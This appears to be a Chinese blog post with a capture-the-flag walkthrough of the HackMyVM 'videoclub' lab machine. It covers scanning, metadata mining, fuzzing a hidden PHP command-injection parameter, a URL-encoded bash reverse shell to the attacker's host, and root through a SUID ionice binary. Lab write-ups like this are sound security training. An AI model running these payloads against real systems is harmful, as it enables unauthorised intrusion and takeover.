当前位置:网站首页>HackMyvm靶机系列(6)-videoclub
HackMyvm靶机系列(6)-videoclub
2022-07-06 09:22:00 【月应知我意】
一、信息收集
因为是校园网,主机太多,我就直接搜索关键字找靶机啦。
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
使用nmap进行端口扫描,探测靶机开放的端口。如图,开放了ssh服务和HTTP服务。
nmap -sV -sC -p- -sT 192.168.200.161
访问3377端口。
看到上面这个我第一反应以为是个cms,使用whatweb进行指纹识别。
whatweb http://192.168.200.161:3377
但是并没有识别出来是什么cms。
那就先进行目录扫描吧。
gobuster dir -u http://192.168.200.161:3377 -w directory-list-2.3-medium.txt -x php,html,txt,7z,zip,bak,gz
发现的东西还不少,挨个访问看看。
发现一个目录遍历,这里面全是图片。
视频
apache使用手册
访问robots.txt,下面发现一长串字符,起初我以为是base64加密的,但是解密以后乱码了。
robots.txt页面最下面还藏了一个文件。
访问list-defaulters.txt文件,下面这些东西。但是一开始还真没看出这干嘛的。但是仔细观察一波,发现下面我圈出来的东西组合一下就有点问题了。
看过我前面文章的小伙伴应该已经知道exiftool是什么了,
ExifTool由Phil Harvey开发,是一款免费、跨平台的开源软件,用于读写和处理图像(主要)、音视频和PDF等文件的元数据(metadata)。
steg hide,意思应该是有隐藏属性吧?
二、漏洞利用
使用exiftool读取图片的元数据,hackers.jpg这张图片最可疑,那就先看看这张图片的属性吧
如图所示,一眼就发现了这段字符非常可疑,那就看看其他图片和视频是否存在Copyright属性吧。
写了一个python脚本,目标的图片全部爬取下来。
爬取视频的时候只需将images改成videos即可。
import requests
from bs4 import BeautifulSoup
re = requests.get('http://192.168.200.161:3377/images/')
soup = BeautifulSoup(re.text,'lxml')
a = soup.find_all('a')
link = list(map(lambda x:'http://192.168.200.161:3377/images/'+x['href'],a))
img_url = list(filter(lambda x:'?' not in x,link))
img_url.remove('http://192.168.200.161:3377/images//')
for url in img_url:
print(url)
r = requests.get(url).content
with open(url.split('/')[-1],'wb') as f:
f.write(r)
最终,在所有图片和视频中收集到了如下信息。
img:
zerial_killer:bien_cabron
video
LostDVD:k1nd3rs
LostDVD=t3rm1n4t0r
LostDVD=m14_w4ll4c3
LostDVD=c0n3h34ds
secret_film:c0ntr0l
一开始我以为这些是账号和密码,就挨个登录了一下。但是毫不意外都失败了。
那就把这些东西和上面的list-defaulters.txt文件组合成一个字典吧,如下图所示。
使用dirsearch进行目录扫描,指定字典为我们刚才生成的。
dirsearch -u "http://192.168.200.161:3377/" -t 50 -e php,htmp,txt,7z,zip,gz,bak -x404,500,599 -w /home/kali/Desktop/video/dict.txt
扫描结果如下。
在使用gobuster进行一波目录扫描。
gobuster dir -u "http://192.168.200.161:3377/" -t 30 -x php,htmp,txt,7z,zip,gz,bak -w dict.txt
扫描结果如下,比dirsearch多了一个c0ntr0l.php文件。
这个结果我真的服了,都是一个字典dirsearch结果怎么还少了一个,这一步卡我好久,以后目录扫描干脆直接上两个扫描器一起扫了。
挨个访问所有结果,其他的内容不是视频就是图片,没有啥价值。
只有c0ntr0l.php文件内容是一片空白。感觉有戏!
http://192.168.200.161:3377/c0ntr0l.php
这个请求似乎没有传入参数,那使用wfuzz进行一下模糊测试,看看有没有惊喜。
字典也要设置为我们之前收集到的哦!
wfuzz -c --hc=404 -t 500 -w dict.txt http://192.168.200.161:3377/c0ntr0l.php?FUZZ=id
结果如下,发现flynn参数可以结果与其他的不同。
访问http://192.168.200.161:3377/c0ntr0l.php?flynn=id
??这里居然可以执行命令。那岂不是可以直接反弹shell?
在kali上监听6666端口
然后使用hackbar访问
http://192.168.200.161:3377/c0ntr0l.php?f1ynn=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.200.192%2F6666%200%3E%261'
再看kali这边,成功反弹shell,但是权限仅是一个web权限
三、权限提升
查看一下/home目录,发现存在两个目录。而secret_film目录看上去有点眼熟,再看看上面我们收集的图片、视频信息,不就包含这个吗?拿去登录试试。
呃.....登陆失败,似乎好像有点不对。这个secret_film目录的属主怎么是root啊
查看一下/etc/passwd,服了,根本就没有secret_film这个用户,这坑是真的多!
librarian用户的家目录居然任何用户都可读可进入
看看目录里都有些什么?
发现flag,而且这个flag任何用户都可以直接读取,拿到第一个flag。
这里还发现一个具有s权限的可执行文件,而且属主是root,那这里是不是可能存在suid提权的可能?
执行下面命令,查询具有suid权限的文件。
find / -perm -u=s -type f 2>/dev/null
注意在执行提权操作的时候不要直接输入
ionice /bin/sh -p,不然就会和我一样,得到的权限还是www-data了。通过which ionice,发现ionice命令的是指向/usr/bin/ionice的,这个文件是不具有s权限的。
需要输入输入绝对路径才能提权成功。
/home/librarian/ionice /bin/bash -p
切换到/root目录,发现没发现root.txt,但是有一个note-for-new-administrator文件。读取文件内容,提示我们root.txt文件已经换地方了。
使用find命令直接搜索root.txt文件
find / -name root.txt
边栏推荐
- 2022泰迪杯数据挖掘挑战赛C题思路及赛后总结
- 【九阳神功】2018复旦大学应用统计真题+解析
- 实验六 继承和多态
- 【VMware异常问题】问题分析&解决办法
- QT meta object qmetaobject indexofslot and other functions to obtain class methods attention
- 强化学习系列(一):基本原理和概念
- (original) make an electronic clock with LCD1602 display to display the current time on the LCD. The display format is "hour: minute: Second: second". There are four function keys K1 ~ K4, and the fun
- Service ability of Hongmeng harmonyos learning notes to realize cross end communication
- 撲克牌遊戲程序——人機對抗
- About the parental delegation mechanism and the process of class loading
猜你喜欢
【手撕代码】单例模式及生产者/消费者模式
FAQs and answers to the imitation Niuke technology blog project (II)
About the parental delegation mechanism and the process of class loading
Difference and understanding between detected and non detected anomalies
C语言入门指南
Service ability of Hongmeng harmonyos learning notes to realize cross end communication
Leetcode. 3. Longest substring without repeated characters - more than 100% solution
7-7 7003 组合锁(PTA程序设计)
附加简化版示例数据库到SqlServer数据库实例中
2. First knowledge of C language (2)
随机推荐
撲克牌遊戲程序——人機對抗
优先队列PriorityQueue (大根堆/小根堆/TopK问题)
String ABC = new string ("ABC"), how many objects are created
[the Nine Yang Manual] 2016 Fudan University Applied Statistics real problem + analysis
SRC挖掘思路及方法
这次,彻底搞清楚MySQL索引
js判断对象是否是数组的几种方式
It's never too late to start. The tramp transformation programmer has an annual salary of more than 700000 yuan
Detailed explanation of redis' distributed lock principle
Implementation of count (*) in MySQL
透彻理解LRU算法——详解力扣146题及Redis中LRU缓存淘汰
SRC mining ideas and methods
Reinforcement learning series (I): basic principles and concepts
实验四 数组
[the Nine Yang Manual] 2017 Fudan University Applied Statistics real problem + analysis
5月14日杂谈
A comprehensive summary of MySQL transactions and implementation principles, and no longer have to worry about interviews
hashCode()与equals()之间的关系
深度强化文献阅读系列(一):Courier routing and assignment for food delivery service using reinforcement learning
The latest tank battle 2022 - full development notes-3